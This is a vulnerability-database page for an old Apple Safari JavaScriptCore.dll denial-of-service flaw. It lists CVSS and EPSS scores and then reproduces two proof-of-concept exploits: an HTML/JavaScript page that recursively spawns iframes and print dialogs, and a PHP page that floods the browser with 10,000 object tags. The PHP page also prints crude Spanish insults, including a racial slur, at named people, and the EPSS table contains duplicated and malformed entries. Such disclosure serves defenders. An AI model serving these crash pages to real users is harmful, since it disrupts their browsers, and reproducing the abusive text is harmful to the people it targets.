CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
JavaScriptCore.dll, as used in Apple Safari 4.0.5 on Windows XP SP3, allows remote attackers to cause a denial of service (application crash) via an HTML document composed of many successive occurrences of the
CVE Informations
Related Weaknesses
CWE-ID
Weakness Name
Source
CWE Other
No informations.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
4.3
AV:N/AC:M/Au:N/C:N/I:N/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
4.19%
–
–
2022-04-03
–
–
4.19%
–
–
2022-07-17
–
–
4.19%
–
–
2023-03-12
–
–
–
0.63%
–
2023-08-27
–
–
–
0.74%
–
2023-09-10
–
–
–
0.74%
–
2023-11-19
–
–
–
0.63%
–
2024-02-11
–
–
–
0.9%
–
2024-03-17
–
–
–
1%
–
2024-06-02
–
–
–
1.2%
–
2024-06-02
–
–
–
1.2%
–
2024-08-25
–
–
–
1.2%
–
2024-09-22
–
–
–
0.9%
–
2024-09-29
–
–
–
1.02%
–
2024-11-03
–
–
–
1.25%
–
2024-12-22
–
–
–
1.65%
–
2025-02-16
–
–
–
1.65%
–
2025-01-19
–
–
–
1.65%
–
2025-02-16
–
–
–
1.65%
–
2025-03-18
–
–
–
–
3.52%
2025-03-30
–
–
–
–
3.83%
2025-03-30
–
–
–
–
3.83,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2010-05-02 22h00 +00:00 Author : Mathias Karlsson EDB Verified : No
<html>
<---------------------
Crash Report
Problem Event Name: APPCRASH
Application Name: Safari.exe
Application Version: 5.31.22.7
Application Timestamp: 4b8f94fa
Fault Module Name: JavaScriptCore.dll
Fault Module Version: 5.31.22.5
Fault Module Timestamp: 4b8cb88c
Exception Code: c00000fd
Exception Offset: 000889f7
OS Version: 6.1.7600.2.0.0.256.48
Locale ID: 1053
Additional Information 1: d4bb
Additional Information 2: d4bb5342a8501f1ef1ad79845414ed25
Additional Information 3: 57f4
Additional Information 4: 57f4717a3dd18c61a213b49009cb5bb7
Tested on: Microsoft Windows 7
By: Mathias Karlsson
URL: http://h.ackack.net/
Note:
If you set the iframe src property to an external document containing the window.print(), the user does not have to press away the first print popup.
---------------------->
<script>
window.print();
a();
function a()
{
setInterval(b,0);
}
function b()
{
var c = document.createElement("iframe");
c.setAttribute("src",document.location);
document.getElementsByTagName("body")[0].appendChild(c);
setInterval(a,0);
}
</script>
</html>
<?php
/***************************************************************************
[TITLE]: SAFARI APPLE 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash)
[OS]: WINDOWS XP SP3
[DOWNLOAD]: http://www.apple.com/es/safari/download/
[AUTHOR]: 3lkt3F0k4
[CONTACT]: 3lkt3F0k4[i_love_spam]gmail[i_love_spam]com
-------------------------CRASH DUMP SNIP------------------------------------
Executable search path is:
Windows XP Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
Machine Name:
Debug session time: Sun Mar 21 23:34:38.000 2010 (GMT+1)
System Uptime: not available
Process Uptime: 0 days 0:01:54.000
................................................................
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(d94.d98): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=01417ea0 edx=0000000a esi=00011ae2 edi=7ff90240
eip=0137b267 esp=00128c50 ebp=00000000 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for JavaScriptCore.dll -
JavaScriptCore!JSC::CString::~CString+0x40d7:
0137b267 c705efbeadbb00000000 mov dword ptr ds:[0BBADBEEFh],0 ds:0023:bbadbeef=????????
-------------------------CRASH DUMP SNIP------------------------------------
***************************************************************************/
$fuzz=str_repeat("<object>",10000);
echo "<title>SAFARI APPLE 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash)</title>";
echo "<center><b><font color='#ff0000'>Wait please...Crash is coming...</font><br><br><br>";
echo "Spanish message for my friends:<br>";
echo "0wn3Dsss!!<br>";
echo "TiTo MC es un negro cabron que rapea como el puto culo.<br>";
echo "Chema Alonso a.k.a. maligno a.k.a. neo payaso MS.<br>";
echo "Eres vergonzoso, penoso, lamo, n44b, l3l,...<br>";
echo "Tus reflexiones son tristes y pobres, vas a comision? das pena chaval!<br>";
echo "Putos focaaaas!<br><br>";
echo "Greetz to my team: Spanishiit Team. Welcome everyone!<br>";
echo "We'll come back fucking more people...Sure!<br><br><br>";
echo "<hr width='80%' />";
echo "<font color='#ff0000'>I <3 Rooted CON 2010. Next year more! (shhhhhh)</font></center>";
echo $fuzz;
?>